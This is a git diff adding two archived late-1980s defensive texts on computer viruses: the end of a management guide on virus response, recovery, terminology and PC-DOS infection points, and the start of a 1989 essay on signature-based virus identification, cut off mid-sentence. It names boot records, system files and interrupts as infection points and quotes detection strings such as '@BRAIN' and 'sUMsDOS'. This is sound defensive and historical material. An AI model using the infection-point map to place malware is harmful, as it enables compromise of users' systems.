+          has infected only one system in a network on Monday, and
+          spread to four by Tuesday, sixteen systems could easily be
+          infected by Wednesday, and over five hundred by Friday.
+          (These numbers are just samples, of course, but they give an
+          idea of the potential speed of spread.  See reference (1)
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                17
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          for some experiments in which much faster spread was
+          observed.)
+ 
+          Because viruses can spread so fast, it is very important to
+          detect them as early as possible after the first infection.
+          The surest way of doing this is to have every vulnerable
+          user run the best available virus-detection software as
+          often as feasible.  This solution may be too expensive and
+          time-consuming for most environments.
+ 
+          In most groups of users, it is possible to identify a number
+          of "star" users who do a disproportionately large amount of
+          information-exchange, who generally run new software before
+          most people do, and who are the first to try out new things
+          in general.  In multi-user systems, some of these people
+          often have special authorities and privileges.  When a virus
+          reaches one of these people, it can spread very rapidly to
+          the rest of the community.  In making cost/benefit decisions
+          about which users should spend the most time or effort on
+          virus-detection, these are the people to concentrate on.
+ 
+ 
+ 
+ 
+          2.6.2  The Importance of Rapid Action
+ 
+ 
+          When a virus is detected, every moment spent deciding what
+          to do next may give the virus another chance to spread.  It
+          is vital, therefore, to have action plans in place *before* an
+          infection occurs.  Such plans should include, for instance:
+ 
+          o   Designation of one particular group (whether formal or
+              informal) as the "crisis team,"
+          o   Procedures for identifying infected systems, by
+              determining how and from where the infection reached
+              each system known to be infected,
+          o   Procedures for isolating those systems until they can be
+              rendered free of the virus,
+          o   Procedures for informing vulnerable users about the
+              virus, and about how to avoid spreading it themselves,
+          o   Procedures for removing the virus from infected systems,
+          o   Procedures for identifying the virus involved, and for
+              developing or obtaining specific software or procedures
+              to combat the virus.  These may remove the virus from
+              infected systems and files, determine whether or not
+              backups are infected, and so on.
+          o   Procedures for recording the characteristics of the
+              virus and the effectiveness of the steps taken against
+              it, in case of later re-infection with the same or a
+              similar virus.
+ 
+          Some suggestions for recovery are given in the next section.
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                18
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          2.7  RECOVERING FROM VIRAL INFECTIONS
+ 
+ 
+          Once a virus has been detected and identified, and measures
+          have been taken to stop it from spreading further, it is
+          necessary to recover from the infection, and get back to
+          business as usual.  The main objective of this activity is
+          to provide each affected user with a normal, uninfected
+          computing environment.  For individual workstations, this
+          means ensuring that no infected objects remain on the
+          workstation.  For more complex environments, it means
+          ensuring that no infected objects remain anywhere on the
+          system where they might inadvertently be executed.
+ 
+          The basic recovery activities are:
+ 
+          o   Replacing every infected object in the system with an
+              uninfected version, and
+          o   Restoring any other objects that the virus' actions may
+              have damaged.
+ 
+          It is of critical importance during these activities to
+          avoid re-introducing the virus into the system.  This could
+          be done, for instance, by restoring an infected executable
+          file from a backup tape.
+ 
+ 
+ 
+ 
+          2.7.1  Restoration and Backups
+ 
+ 
+ 
+          An obvious but incorrect approach to removing the infection
+          from a system is simply to restore the infected objects from
+          backups.  This is *not* a wise thing to do, however, since
+          the backups themselves may be infected.  If the virus first
+          entered the system sufficiently long ago, infected objects
+          may well have been backed up in infected form.
+ 
+          Once the virus has been well understood, in terms of what
+          types of objects it spreads itself to, three different
+          categories of objects may be considered for restoration:
+ 
+          o   Objects of the type that the virus infects.  These
+              should only be restored from backups if the backed-up
+              versions are thoroughly and individually checked for
+              infection by the virus.  If it is possible, it is
+              preferable to restore the objects from more "trusted"
+              sources, such as original, unwriteable, copies supplied
+              by the manufacturer, or by recompiling source code.
+              Even in these cases, it is worthwhile to check once
+              again for infection after restoration has been done.
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                19
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          o   Objects of types that the virus does not infect, but
+              which have been destroyed or altered by the virus'
+              actions.  These can generally be restored from backups
+              safely, although again it is worth checking the
+              integrity of the backed-up copies.  If the virus has
+              been in the system long enough, it may have damaged
+              objects that were later backed up.
+ 
+          o   Objects of types that the virus neither infects, nor
+              damages.  If you are very sure that the virus does not
+              infect or alter certain types of files, there may be no
+              need to restore those files during the recovery process.
+ 
+ 
+ 
+          2.7.2  Virus-Removing Programs
+ 
+ 
+          Once a virus has been studied, you can write or obtain
+          programs to help remove that particular virus.  One type of
+          these programs checks for the presence of the virus in a
+          executable objects.  Another type tries to remove the
+          infection by restoring the object to its previous uninfected
+          form.  "Checking" programs can be extremely valuable during
+          the recovery process, to ensure that files that are being
+          restored after infection or damage by the virus are now
+          "clean." "Removal" programs are somewhat less useful, and
+          should usually only be used when there is no other practical
+          way to obtain an uninfected version of the object.  Removing
+          a virus from an executable object can be a complex and
+          difficult process, and even a well-written program may fail
+          to restore the object correctly.
+ 
+ 
+ 
+          2.7.3  Watching for Re-Infection
+ 
+ 
+          Once recovery is complete, and all known infected and
+          damaged objects have been restored to uninfected and correct
+          states, it is necessary to remain watchful for some time.  A
+          system that has recently been infected by a certain virus
+          runs an increased risk of re-infection by that same virus.
+          The re-infection can occur through some obscure, infected
+          object that was missed in the recovery process.  It can also
+          occur from the same outside source as the original
+          infection.  This is especially true if the original source
+          of infection is not known.
+ 
+          Vigilance in the use of general virus-detection programs,
+          like those described above, continues to be important.  In
+          addition, it will often be possible to obtain or write
+          programs designed to detect the specific virus from which
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                20
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          the system has just recovered.  Specific virus-detection
+          programs of this kind are particularly useful at this time.
+          The same users who use the general virus-detection programs,
+          and any users who would be specifically vulnerable to the
+          virus just recovered from, can be given such programs to
+          run.  This increases the probability of detection, should an
+          infection recur.  The programs might also be incorporated
+          into the backup system for a time, to scan files being
+          backed up for infection, and even into appropriate places in
+          networks and file-sharing systems.  Because such checks will
+          introduce extra overhead, there will be a trade-off between
+          performance and added security in considering how long to
+          leave them in place.
+ 
+ 
+ 
+          2.8  SUMMARY AND RECOMMENDATIONS
+ 
+ 
+          Computer viruses can pose a threat to the security of
+          programs and data on computing systems.  We have suggested
+          several means of limiting this threat.  They are summarized
+          below.
+ 
+ 
+          o   Viruses represent a new kind of threat to the security
+              of computing systems.
+ 
+              -   They can be spread without the intent of the people
+                  who spread them.
+              -   They can spread widely and quickly within an
+                  organization, reaching systems and users well beyond
+                  the initial infection point.
+              -   They can perform virtually any action that their
+                  designer intends.
+ 
+ 
+          o   The risks posed by viruses can be limited by proper
+              action.
+ 
+              -   Follow good security practices in general.
+ 
+                  --  Educate your users about security threats,
+                      including computer viruses.
+                  --  Make sure that good backups are kept of all
+                      important data.
+ 
+              -   Take steps to reduce the possibility of being
+                  infected.
+ 
+                  --  Where practical, isolate critical systems from
+                      sources of infection, such as networks and
+                      outside programs.
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                21
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+                  --  Where practical, limit the ability to create or
+                      install new programs on those systems which do
+                      not require this ability.
+                  --  Ensure that adequate controls exist on software
+                      repositories, production systems, and other
+                      important areas of your organization.  These
+                      include careful change management and the use of
+                      virus detectors.
+ 
+              -   Take steps to ensure that virus infections will be
+                  detected quickly.
+ 
+                  --  Educate your users about possible warning signs.
+                  --  Use virus detectors, which will inform users of
+                      the unintended modification of programs and
+                      data.
+                  --  Make sure your users know to whom they can
+                      report a potential problem.
+ 
+              -   Take steps to contain virus infections that are
+                  detected.
+ 
+                  --  A plan to deal with an infection should be put
+                      into place *before* an infection occurs.
+                  --  A "crisis team" should be put into place, which
+                      can respond quickly to a potential problem.
+                  --  Isolate infected systems until they can be
+                      cleaned up, to avoid them infecting other
+                      systems, and to avoid their becoming reinfected.
+ 
+              -   Take steps to recover from viral infections that are
+                  contained.
+ 
+                  --  Be able to restore critical programs and data
+                      from virus-free backups.
+                  --  Know how to remove viruses from programs if
+                      virus-free backups are unavailable.
+                  --  Watch for a reinfection from that particular
+                      virus.
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          Coping with Computer Viruses: A Guide for Technical
+          Management                                                22
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          FOR FURTHER READING
+ 
+ 
+ 
+          (1)  Fred Cohen, "Computer Viruses: Theory and Experiment,"
+                Computers & Security, Vol. 6 (1987), pp. 22-35
+ 
+          (2)  Fred Cohen, "On the Implications of Computer Viruses
+                and Methods of Defense," Computers & Security, Vol. 7
+                (1988), pp. 167-184
+ 
+          (3)  W.H. Murray, "Security Considerations for Personal
+                Computers," IBM System Journal, Vol. 23, No. 3 (1984),
+                pp. 297-304
+ 
+          (4)  --, "Security Risk Assessment in Electronic Data
+                Processing Systems," IBM Publication Number
+                G320-9256-0 (1984)
+ 
+          (5)  --, "Good Security Practices for Information Systems
+                Networks," IBM Publication Number G360-2715-0 (1987)
+ 
+          (6)  --, "An Executive Guide to Data Security," IBM
+                Publication Number G320-5647-0 (1975)
+ 
+          (7)  --, "Security, Auditability, System Control
+                Publications Bibliography," IBM Publication Number
+                G320-9279-2 (1987)
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          For Further Reading                                       23
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+                GLOSSARY
+ 
+ 
+ 
+                Computer viruses and the like are relatively new
+                phenomena.  The terms used to describe them do not
+                have definitions that are universally agreed upon.  In
+                this glossary, we give definitions that try to clarify
+                the differences between the various concepts.  These
+                terms may be used differently elsewhere.
+ 
+ 
+ 
+                Availability:  That aspect of security that deals with
+                the timely delivery of information and services to the
+                user.  An attack on availability would seek to sever
+                network connections, tie up accounts or systems, etc.
+ 
+                Back Door:  A feature built into a program by its
+                designer, which allows the designer special privileges
+                that are denied to the normal users of the program.  A
+                back door in a logon program, for instance, could
+                enable the designer to log on to a system, even though
+                he or she did not have an authorized account on that
+                system.
+ 
+                Bacterium (informal):  A program which, when executed,
+                spreads to other users and systems by sending copies
+                of itself.  (Though, since it does "infect" other
+                programs, it may be thought of as a "system virus" as
+                opposed to a "program virus.") It differs from a
+                "rabbit" (see below) in that it is not necessarily
+                designed to exhaust system resources.
+ 
+                Bug:  An error in the design or implementation of a
+                program that causes it to do something that neither
+                the user nor the program author had intended to be
+                done.
+ 
+                Confidentiality:  That aspect of security which deals
+                with the restriction of information to those who are
+                authorized to use it.  An attack on confidentiality
+                would seek to view databases, print files, discover a
+                password, etc., to which the attacker was not
+                entitled.
+ 
+                Integrity:  That aspect of security that deals with
+                the correctness of information or its processing.  An
+                attack on integrity would seek to erase a file that
+                should not be erased, alter an element of a database
+                improperly, corrupt the audit trail for a series of
+                events, propagate a virus, etc.
+ 
+ 
+ 
+ 
+          Glossary                                                  24
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+                Logic Bomb:  A Trojan Horse (see below), which is left
+                within a computing system with the intent of it
+                executing when some condition occurs.  The logic bomb
+                could be triggered by a change in a file (e.g. the
+                removal of the designer's userid from the list of
+                employees of the organization), by a particular input
+                sequence to the program, or at a particular time or
+                date (see "Time Bomb" below).  Logic bombs get their
+                name from malicious actions that they can take when
+                triggered.
+ 
+                Rabbit (informal):  A program is designed to exhaust
+                some resource of a system (CPU time, disk space, spool
+                space, etc.) by replicating itself without limit.  It
+                differs from a "bacterium" (see above) in that a
+                rabbit is specifically designed to exhaust resources.
+                It differs from a "virus" (see below) in that it is a
+                complete program in itself; it does not "infect" other
+                programs.
+ 
+                Rogue Program:  This term has been used in the popular
+                press to denote any program intended to damage
+                programs or data, or to breach the security of
+                systems.  As such, it encompasses malicious Trojan
+                Horses, logic bombs, viruses, and so on.
+ 
+                Security:  When applied to computing systems, this
+                denotes the authorized, correct, timely performance of
+                computing tasks.  It encompasses the areas of
+                confidentiality, integrity, and availability.
+ 
+                Time Bomb:  A "logic bomb" (see above) activated at a
+                certain time or date.
+ 
+                Trojan Horse:  Any program designed to do things that
+                the user of the program did not intend to do.  An
+                example of this would be a program which simulates the
+                logon sequence for a computer and, rather than logging
+                the user on, simply records the user's userid and
+                password in a file for later collection.  Rather than
+                logging the user on (which the user intended), it
+                steals the user's password so that the Trojan Horse's
+                designer can log on as the user (which the user did
+                not intend).
+ 
+                Virus (pl. viruses):  a program that can "infect"
+                other programs by modifying them to include a possibly
+                evolved copy of itself.  Note that a program need not
+                perform malicious actions to be a virus; it need only
+                "infect" other programs.  Many viruses that have been
+                encountered, however, do perform malicious actions.
+ 
+                Worm:  A program that spreads copies of itself through
+                network-attached computers.  The first use of the term
+ 
+ 
+          Glossary                                                  25
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+                described a program that copied itself benignly around
+                a network, using otherwise-unused resources on
+                networked machines to perform distributed computation.
+                Some worms are security threats, using networks to
+                spread themselves against the wishes of the system
+                owners, and disrupting networks by overloading them.
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          Glossary                                                  26
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+                APPENDIX: VIRAL INFECTIONS IN PC-DOS
+ 
+ 
+ 
+                This section is intended to give an example of the
+                places in a typical computer system where a virus
+                might enter.  It is intended for a reader with some
+                knowledge of the workings of PC-DOS, although it may
+                be instructive to others as well.  PC-DOS was chosen
+                for convenience; many computer systems have similar
+                vulnerabilities.
+ 
+                Consider the process that is required for you to run a
+                single program.  What is happening?  Which parts do
+                you not bother checking since you have seen it a
+                million times?
+ 
+                For example, you turn on the power switch and then ...
+ 
+                o   You boot off the disk.  What code ran to enable
+                    you to boot off the disk?
+ 
+                o   You boot off a diskette drive.  Again ...
+ 
+                o   You run a program.  It reads off a disk.  What was
+                    actually read in?  How was it read in?  What did
+                    the reading?
+ 
+                o   You compile a program.  Are you using any library
+                    files?  What is in them?
+ 
+                o   When was the last time you looked at your
+                    CONFIG.SYS?  AUTOEXEC.BAT?
+ 
+                o   You just bought a brand new program.  You just
+                    brought it home from the store.  What do you know
+                    about the program?  About the company that
+                    produced it?
+ 
+                This list is not meant to be all-inclusive nor
+                thorough.  It is meant to be a spark to start
+                education.  Let us continue by examining each of these
+                cases.  (Where found, the symbol "(!)" is used to
+                designate a potential point of attack for viruses.)
+ 
+ 
+ 
+ 
+                When you turn on the power switch
+ 
+ 
+                Before we investigate the different cases above, we
+                examine the steps that occur when you first flip the
+                power switch of your IBM PC to the ON position.
+ 
+ 
+          Appendix: Viral Infections in PC-DOS                      27
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+                Power is given to the system.  A section of code known
+                as POST (Power On Self Test) residing in ROM (Read
+                Only Memory) starts running.  It checks memory,
+                devices, peripherals, and then transfers control to
+                any "properly signatured" ROMs found in the I/O
+                channels.  Assuming those pieces run smoothly, control
+                returns to POST.  When POST completes, it searches for
+                a diskette in the diskette drive.  If unsuccessful, it
+                tries to boot off a hard file.  And finally, if
+                neither works, it starts running the BASIC interpreter
+                which is found in its ROM.
+ 
+                The first place where programs are read into system
+                RAM (Random Access Memory) is the hard file or
+                diskette boot up process.  Until then, all the code
+                that is run has come from ROM.  Since these ROMs are
+                from trusted sources, we must assume that they have
+                not been created with viruses installed.  ROMs, by
+                their nature, can only be written by special
+                equipment, not found in your PC.  Thus to tamper with
+                them, they must be removed and/or replaced without
+                your knowledge.  For the purposes of this discussion,
+                we will assume that this has not happened.
+ 
+ 
+ 
+                Boot from hard file
+ 
+ 
+                When the computer boots off the hard file, it relies
+                on code which has been placed in two areas on the hard
+                file.  The first location is the master boot
+                record(!).  The master boot record contains code and
+                information to designate which "system boot record"(!)
+                to read and run.  This is the "active partition."
+                There are potentially many system boot records, one
+                for each partition, while there is only one master
+                boot record.
+ 
+                Boot records on a fixed disk vary.  But usually, up to
+                a whole track is reserved.  This is a large amount of
+                space, most of which is not normally used.  The large
+                empty space provides a potential area for viruses to
+                hide.
+ 
+ 
+ 
+                Boot from diskette
+ 
+ 
+                For a floppy disk, the boot record is a properly
+                "signatured" sector at head 0 track 0 sector 1 of the
+                disk(!).  If the machine finds a proper signature, it
+                takes the bytes stored in that sector and begins
+ 
+ 
+          Appendix: Viral Infections in PC-DOS                      28
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+                executing them.  This code is usually very short.
+                Usually, one of the first things it does is to tell
+                the machine where to get other sectors to form a
+                complete boot up program.
+ 
+                Viruses can hide parts of themselves on either hard or
+                floppy disks, in sectors that they mark as "bad."(!)
+                These sectors would require special commands to be
+                read.  This prevents the code from being accidentally
+                overwritten.  They also provide an obvious sign,
+                should you be looking for them (CHKDSK will report bad
+                sectors).
+ 
+ 
+ 
+                PC-DOS, the operating system
+ 
+ 
+                The purpose of the boot records is to load the
+                operating system.  This is done by loading files with
+                the names IBMBIO.COM(!), IBMDOS.COM(!), and
+                COMMAND.COM(!).  These files contain the operating
+                system.
+ 
+                After the operating system is loaded, it becomes the
+                integral portion of all system activities.  This
+                includes activities such as reading and writing
+                files(!), allocating memory(!), and allocating all
+                other system resources(!).  Few applications exist
+                that do not use the operating system to take advantage
+                of the system resources.  Thus, some viruses change
+                COMMAND.COM or intercept attempts to request a system
+                resource.
+ 
+                The purpose of such action would be two-fold.  The
+                first purpose is to place the virus in a common code
+                path, so that it is executed frequently so that it may
+                have ample opportunity to spread.  The second is to
+                cause damage, intercepting the proper request and
+                altering the request.
+ 
+ 
+ 
+ 
+                Running a program
+ 
+ 
+                What code runs when you run a program? (!)  (The
+                following list is not meant to be complete.  It is to
+                show you that any link could be a potential point of
+                attack for a virus.  Since the virus' purpose is to be
+                executed frequently, it would find itself executed
+                frequently enough if it resided in any of the
+                following areas.)
+ 
+ 
+          Appendix: Viral Infections in PC-DOS                      29
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+                o   DOS accepts your keystrokes.
+ 
+                    -   BIOS INT 9H, INT 16H, INT 15H, INT 1BH
+                    -   DOS INT 21H keyboard functions, INT 28H
+                    -   Any keyboard device driver or TSR (Terminate
+                        and Stay Resident) program.
+ 
+                o   DOS loads your program
+ 
+                    -   BIOS INT 13H, INT 40H, INT 15H
+                    -   DOS INT 21H file search functions, memory
+                        allocation, set DTA, disk read, CTRL-BREAK
+                        check, etc.
+                    -   Any DOS extension driver or TSR (Terminate and
+                        Stay Resident) program.
+ 
+                o   General background functions
+ 
+                    -   BIOS INT 8 (timer), INT 0FH (printer), INT 1CH
+                        (timer)
+                    -   Any system driver or TSR (Terminate and Stay
+                        Resident) program.
+ 
+                All these things happen and more, each time you run a
+                program.
+ 
+ 
+ 
+                CONFIG and AUTOEXEC
+ 
+ 
+                Every time you boot your system, CONFIG.SYS(!)  and
+                AUTOEXEC.BAT(!) tell the system to load many files and
+                options before you can start working on the computer.
+                If a virus decided to attach an extra line of
+                instruction to one of these files, it would result in
+                the program being loaded each day.  When was the last
+                time you looked at CONFIG.SYS?  AUTOEXEC.BAT?  Do you
+                remember the reason for the existence of each line in
+                the two files?
+ 
+ 
+ 
+                Compiling programs, using libraries
+ 
+ 
+                When you compile a program, you use several programs.
+                One is the compiler itself (!).  If the compiler is
+                infected with a virus, the virus may spread to other,
+                unrelated programs.  But it could also spread to the
+                program being compiled.
+ 
+                When a compiled program is linked to form an
+                executable program, it is common to link in programs
+ 
+ 
+          Appendix: Viral Infections in PC-DOS                      30
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+                from libraries(!).  These library programs provide
+                standard operating system interfaces, perform input
+                and output, and so on.  If one or more of the library
+                programs are infected with a virus, then every program
+                which is linked with it will be infected.
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          Appendix: Viral Infections in PC-DOS                      31
+ 
+ 
+ 
+
\ No newline at end of file
diff --git a/textfiles.com/virus/identify.txt b/textfiles.com/virus/identify.txt
new file mode 100644
index 00000000..e97ac225
--- /dev/null
+++ b/textfiles.com/virus/identify.txt
@@ -0,0 +1,339 @@
+	The following document is copyrighted, 1989, by Tim Sankary -
+all rights reserved.  It may be copied and distributed freely as long
+as no changes are made and as long as this copyright notice remains
+with the document
+	
+	I want to preface this document with a personal statement.  I
+am aware that Jim Goodwin has published a partial list of his virus
+disassemblies and I can imagine the controversy that will result.  I
+do not have an inside track to the "truth" of this Distribute/Don't
+Distribute issue, and I can frankly see both sides of the argument.  I
+find it hard, however, to censure a colleague who has performed such
+excellent and dedicated work as Jim has, and I have to admire his
+courage in taking such a controversial step.  For those of you who
+anticipate writing or designing Identification and Removal programs
+(CVIA Class III programs) for viruses, I hope you will find something
+of value in the following study that will be useful.  If you have
+access to disassemblies, this document may provide some insights into
+designing your own disinfectant.
+	I would like to thank "Doc" John McAfee for his guidance and
+help in developing this paper, and the Computer Virus Industry
+Association for the outstanding visual aids that they contributed.
+These figures have been referenced in the paper but I have been unable
+to create ASCII representations of them for BBS distribution.  If you
+obtained this document from an electronic source and would like a copy
+of the figures, they can be obtained by sending a stamped, self
+addressed envelope to the CVIA, 4423 Cheeney Street, Santa Clara, CA.
+95054.  - Tim Sankary
+	    From the Homebase BBS
+	    408 988 4004
+
+
+
+	DEVELOPING VIRUS IDENTIFICATION PRODUCTS
+	
+
+	In January of 1986, the world's first computer virus was
+unleashed upon an unsuspecting and largely defenseless population of
+global IBM personal computers users.  The virus originated in Lahore,
+Pakistan, and spread rapidly from country to country through Europe
+and across to the North American Continent.  In less than twelve
+months it had infected nearly a half-million computers and was causing
+minor havoc in hundreds of universities, corporations and government
+agencies.
+	This virus, later dubbed the "Pakistani Brain", caught the
+user community unawares and the problems resulting from its many
+infections demonstrated how unprepared we were for this phenomenon.
+The computer systems targeted by the virus contained no specific
+hardware or software elements that could prevent or even slow its
+spread, and few utilities could even detect its presence after an
+infection occurrence.  Fortunately, the virus was not destructive, and
+it limited its infections to floppy diskettes; avoiding hard disks
+entirely.
+	The first defensive procedure developed to counteract this
+virus involved a simple visual inspection of a suspected diskette's
+volume serial label.  The virus erased every infected diskette's
+volume label and replaced it with the character string - "@BRAIN".
+Thus, any inspection of the volume label, such as performing a simple
+DIRECTORY command, would indicate the presence or absence of the
+virus.  An infected diskette could then be reformatted, or the virus
+could be removed by replacing the boot sector.  This manual procedure
+is a typical, if somewhat rudimentary, example of the type of
+functions performed by a class of antiviral utilities commonly called
+Infection Identification products.
+	Infection identification products generally employ "passive"
+techniques for virus detection.  That is; they work by examining the
+virus in its inert state.  This contrasts with active detection
+products which look for specific actions employed by a virus.  For
+example, looking for a Format instruction within a segment of code on
+a disk would be a passive method of detecting a potentially
+destructive program.  If we detected the Format attempt during program
+execution, however, we would be performing an active detection.
+Passive methods concern themselves with the static attributes of
+viruses, active methods concern themselves with the results of virus
+execution.
+	Example active indicators are: the attempted erasure of
+critical files, destruction of the FAT table, re-direction of system
+interrupt vectors, general slowdown of the system, or an attempt to
+modify an executable program.  These indicators are generic; that is,
+they are common to a large class of viruses.  Because so many viruses
+perform these common activities, however, they are of little use in
+identifying individual virus strains.  It is the passive virus
+indicators that prove most useful to a positive identification: The
+characteristic text imbedded within the virus, specific flags,
+singular filenames or a distinctive sequence of instructions that are
+unique to the virus.  These and other similar indicators can best be
+ascertained by scanning system storage and examining the program files
+and other inert data.
+	
+History
+	Virus identification products have their genesis in the
+utility programs first developed in 1982 and 1983 to check public
+domain software for bombs or trojans before they were executed.  These
+utility programs initially checked for questionable instructions in
+the suspect program's object code.  Direct input/output instructions,
+interrupt calls, format sequences and like instructions, if found,
+were flagged and the user was notified.  Later versions included tests
+for imbedded data strings that were typically used by trojan
+designers.  Suspect programs were scanned for profanity, for keywords
+like "gotcha" or "sucker", and for data strings that had been found in
+specific trojan programs.  Some programs looked also for specific
+names of files that were frequently used by trojans and bombs.
+	These products, however, were seldom able to identify a
+specific bomb or trojan.  Rather, they indicated that the suspect
+program contained instructions or messages of a questionable nature -
+implying that the program might be a generic trojan.  This, however,
+is not sufficient for dealing with viruses.
+	Viruses create entirely different problems than bombs or
+trojans.  Viruses replicate, and can infect hundreds or even thousands
+of programs within an installation.  They remain invisible for long
+periods of time before they activate and cause damage.  And, they are
+difficult to remove because they imbed themselves within critical
+segments of the system.  It is not sufficient to know that a virus is
+present, it is necessary to know which virus is present.  We must know
+how it infects, what actions it takes, and, most importantly, what
+must be done to de-activate and remove the virus.
+	Thus, when the first virus identification products emerged in
+1986 they didn't just look for generic code or messages, they looked
+for specific indications that could identify the individual virus
+strain.  This allowed the user to verify a specific infection
+occurrence and take appropriate action.  Later versions of these
+products went a step further.  They actually removed the virus when an
+infection was identified.
+	  
+Techniques
+	Before we discuss the techniques used by identification
+products, we need to look briefly at how viruses insert themselves
+into programs.  As shown in Figure 1, viruses actually modify the
+structure of the programs that they infect.  Generally, the virus
+replaces the program's start-up segment with a routine that passes
+control to the main body of the virus.  This main body code may be
+inserted within the program in a buffer area, or it may be added to
+the beginning or the end of the program.  After execution of the
+virus, the program's original start-up sequence is replaced and
+control is passed to the program.
+	When removing a virus from an infected program, it is crucial
+to determine exactly how the virus modified the program.  Each virus
+differs from other viruses in size, segmentation and technique.  Each
+virus chooses a different area for infection, stores the start-up
+sequence in a different location. and return control in a different
+manner.  We must know exactly what the virus did during the infection
+process in order to reverse the steps for removal.
+	Thus, it should be clear that in order to develop an antidote
+for a specific virus, we must first obtain a copy of the virus for
+analysis.  A thorough analysis of the structure and design of the
+virus will provide the answers to all of the above questions.
+	When a virus has been disassembled and analyzed, we in theory
+know all there is to know about the virus.  We are then able to create
+an "attribute file" for the virus.  This file contains all of
+characteristics of the virus that can be uniquely assigned to the
+virus.  For example, we may find imbedded data within the virus that
+we would not reasonably expect to find in any other program or data
+file.  Or we may find an instruction sequence that is sufficiently
+unusual that we would not expect any other program to use the exact
+same sequence.  Figure 2 shows two virus examples that contain unique
+imbedded data.	 In the Pakistani Brain example, it is clear that we
+would not expect to find the exact same name, address and telephone
+number in any other program.
+	In addition to "identification" attributes, the attribute file
+contains all information necessary to reverse the virus infection
+process.  Common elements of an attribute file might be:
+		- Executable code signatures
+		- Volume label flags
+		- Hidden file names
+		- Absolute sector address contents
+		- Key data at specific file offsets
+		- Specific interrupt vector modifications
+		- ASCII data content
+		- Specific increases in bad sector counts
+	When the attribute file has been created, it is inputted into
+a program that scans all of the appropriate areas of system storage
+looking for combinations of the attributes.  As more attributes are
+discovered, the degree of assurance that the virus is present
+increases.  For example, the character string "sUMsDOS" is common to
+all versions of the Israeli virus.  It is conceivable, however, that
+the same string could appear randomly in any text file.  Therefore,
+the identification program will look for verification attributes, such
+as the file offset where the character string was located, or a
+sequence of instructions following the data.
+	When the virus has been identified, the removal phase begins.
+Since the infection attributes of the virus are known, the removal
+process is fairly straightforward.  Usually it involves locating the
+main body of the virus and all segments of the original program that
+had been re-located by the virus.  The virus is erased, and the
+program is then re-constructed.
+	Clearly, multiple attribute files can be used by a single
+program.  Thus, single identification products are able to identify
+multiple strains of viruses (see Figure 3).
+
+Product Advantages
+	Infection identification products have a major advantage over
+other types of virus protection products: They are able to determine
+whether or not a system is already infected.  This is a serious
+concern in many organizations.  Other classes of virus protection
+products must assume that a given system is uninfected at the time the
+products are installed.  They log the state of the system at the time
+they are installed and periodically compare the current state to the
+original state.  If a virus has infected the system in the interim,
+the change will be detected.  If a virus has already infected the
+system before such products are installed, however, the virus will be
+logged as part of the original system, and no change will be detected.
+	Infection identification products, on the other hand, are
+specifically designed to look for and identify pre-existing
+infections.  This ability to identify an existing infection is in many
+cases crucial to the success of implementing antiviral measures.
+Since a virus may remain dormant for months or even years before it
+activates and damages the system, pre-existing infections could cause
+widespread destruction in spite of our best efforts at implementing
+protection programs.
+	Automatic removal is the second advantage of identification
+products.  Virus infections can sometimes involve hundreds or
+thousands of programs within an organization.  When the virus is
+discovered, the task of tracking down and disinfecting all of the
+infected programs can become monumental.  In many cases, multiple
+versions of a single program may be infected, or the original source
+diskettes may have been lost or misplaced.  In some cases, infected
+programs may be overlooked or incorrectly replaced, so that re-
+infection becomes a problem.  These and other issues invariably cause
+problems.  The identification products, however, automatically find,
+identify and remove the infection, normally at a rate of a few seconds
+per infected program.  The time savings alone can be enormous.
+	A third advantage to identification programs is that they
+cannot be circumvented by a known virus.  Other types of products that
+use active methods for infection prevention or detection can be
+specifically targeted by viruses.  The virus can seek out and destroy
+or disable the active element of such products.  For example, if the
+product is a filter type product that monitors all system I/O, the
+virus can steal the interrupts from the monitor and thus bypass the
+program's checking function.  Likewise, if a protection program uses a
+checksum or other method to look for change within a program, the
+virus can modify the program's checksum routine so that the change
+caused by an infection will not be detected.  These and other
+techniques have been used by many viruses to avoid interference by
+antiviral programs that use active detection methods.
+	Identification products, on the other hand, cannot be so
+easily circumvented.  Since these products use passive techniques, the
+virus has no control over the products' functions.  Keep in mind that
+the virus and its resultant system modifications are merely a sequence
+of inert bits as far as the identification product is concerned.  Also
+the virus is not active at the time the product is being used (all
+such products come with their own boot diskettes, and they run
